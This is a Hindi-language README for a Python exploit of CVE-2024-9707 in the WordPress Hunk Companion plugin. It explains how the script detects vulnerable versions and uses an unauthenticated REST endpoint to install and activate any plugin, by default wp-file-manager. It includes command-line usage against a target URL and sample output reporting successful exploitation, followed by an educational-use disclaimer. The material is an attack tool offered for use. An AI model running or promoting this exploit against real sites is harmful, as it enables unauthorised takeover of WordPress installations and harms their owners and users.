
यह Hunk Companion Plugin for WordPress: अनधिकृत प्लगइन स्थापना/सक्रियण के लिए संवेदनशील (संस्करण 1.8.4 तक और सहित)
यह स्क्रिप्ट WordPress Hunk Companion प्लगइन (CVE-2024-9707) में मौजूद कमजोरी का शोषण करती है, जो अनधिकृत हमलावरों को /wp-json/hc/v1/themehunk-import REST API एंडपॉइंट के माध्यम से मनमाने प्लगइन्स को इंस्टॉल और सक्रिय करने की अनुमति देती है।
| विशेषता | विवरण |
|---|---|
| प्लगइन संस्करण पहचान | स्वचालित रूप से प्लगइन संस्करण की जाँच करता है। |
| कमजोरी जाँच | यह निर्धारित करता है कि पता लगाया गया संस्करण कमजोर है या नहीं (<= 1.8.4)। |
| प्लगइन स्थापना | एक निर्दिष्ट प्लगइन को स्थापित और सक्रिय करने के लिए कमजोरी का शोषण करता है। |
requests, argparse।pip install requests
options:
-h, --help show this help message and exit
-u URL, --url URL Base URL of the WordPress site.
-p PLUGIN, --plugin PLUGIN
Plugin name (default: wp-file-manager).
2- स्क्रिप्ट चलाएँ
python CVE-2024-9707.py -u <TARGET_URL> [-p <PLUGIN_NAME>]
python CVE-2024-9707.py -u https://example.com -p wp-file-manager
Detected version: 1.8.4
The site is vulnerable. Proceeding with exploitation.
Plugin installed and activated successfully.
Response Status: 200
Response Body: "http:\/\/192.168.100.74\/wordpress"
यह स्क्रिप्ट केवल शैक्षिक उद्देश्यों के लिए है। इसका जिम्मेदारी से उपयोग करें और केवल उन सिस्टमों पर करें जिनके आप मालिक हैं या जिनके परीक्षण की स्पष्ट अनुमति है। लेखक इस उपकरण के किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं हैं। द्वारा: Khaled_alenazi | Nxploited